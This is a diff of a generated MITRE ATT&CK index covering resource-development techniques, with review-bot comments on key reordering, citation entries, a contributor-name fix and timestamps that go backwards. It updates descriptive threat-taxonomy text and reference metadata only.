A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
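Review bot: Most of this hunk is key reordering (`x_mitre_platforms`, `x_mitre_is_subtechnique`, `x_mitre_deprecated` and `x_mitre_contributors` are removed and re-added unchanged at a different position), which buries the two substantive changes: the description gains the sentence on cloud messaging services (Twilio, SendGrid, AWS End User Messaging, SNS, SES) with two new citations, and `x_mitre_version` goes from `'1.0'` to `'1.1'`. If the generator can emit keys in a stable order, the diff would shrink to those lines. The two new `(Citation: ...)` keys, `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024`, need matching `external_references` entries; both are added in the next hunk, so that part checks out.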
@@ -52495,10 +53158,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -52506,9 +53178,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -52559,11 +53230,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52576,7 +53246,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
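Review bot: The contributor rename from `Goldstein Menachem` to `Menachem Goldstein` is applied here for T1608.001 and again for T1584 and T1608.005 later in this patch; a quick grep for the old ordering across the other index files would confirm no entry was missed, since a partial rename leaves the same person listed under two names.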
@@ -52611,22 +53281,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
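Review bot: The new closing paragraph on registering a domain from inside a compromised AWS environment via Route53 introduces the citation key `Invictus IR DangerDev 2024`, which needs a matching reference entry and a version bump; both are present later in the patch (`x_mitre_version: '1.4'` in the `@@ -52647` hunk, the Invictus entry in the `@@ -52686` hunk). The PR description should state which ATT&CK release this text was pulled from, so a reader can tell the wording is upstream content rather than a local edit that the next regeneration would overwrite.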
@@ -52647,7 +53320,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -52686,6 +53359,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52741,7 +53418,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -52799,7 +53475,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -52879,7 +53554,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -52939,7 +53613,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -52961,7 +53634,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -52980,42 +53653,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
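Review bot: Taken on its own, this hunk strips the identity of T1583.003 (`id`, `type`, `created`, `created_by_ref`, the full `external_references` list, `object_marking_refs`, `x_mitre_platforms`, `x_mitre_domains`); the next hunk re-adds every one of those keys, with `external_references` in a different order plus `revoked: false` and `x_mitre_deprecated: false`, so the two hunks have to be read together. I checked that the four reference `source_name`s match one to one (TrendmicroHideoutsLease, ThreatConnect Infrastructure Dec 2020, Mandiant SCANdalous Jul 2020, Koczwara Beacon Hunting Sep 2021); it is still worth confirming nothing downstream depends on the order of `external_references`.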
@@ -53024,22 +53665,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -53053,7 +53725,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -53140,11 +53812,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -53204,7 +53875,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -53246,7 +53916,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53261,7 +53931,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -53352,11 +54021,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53389,15 +54057,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
@@ -53481,7 +54150,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -53535,7 +54203,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -53586,36 +54253,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53624,21 +54265,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
@@ -53684,17 +54351,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -53720,7 +54386,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
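Review bot: the `modified` timestamp for T1585.001 goes backwards here, from `'2022-04-25T14:00:00.188Z'` to `'2021-10-16T17:37:34.563Z'`. A regenerated index should not make an object older, so this suggests the bundle this technique was pulled from is an older export than the one the previous index used. The same regression shows up below for T1587.004, T1608.003, T1584.002, T1588.003 and T1588.005; check the upstream source once rather than accepting each of these individually.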
@@ -53752,8 +54418,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
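Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted for T1585.001 rather than bumped, whereas T1588.002 earlier in this diff goes from `2.1.0` to `3.2.0` and `T1584.006` goes from `3.1.0` to `3.2.0`. In the visible lines of this entry no attack-spec version remains, which, combined with the `modified` regression in the previous hunk, reads like the object was emitted from an older export. If that is not intended, the entry should carry `x_mitre_attack_spec_version: 3.2.0` like the updated ones.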
@@ -53780,7 +54444,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53804,8 +54468,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -53831,7 +54493,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
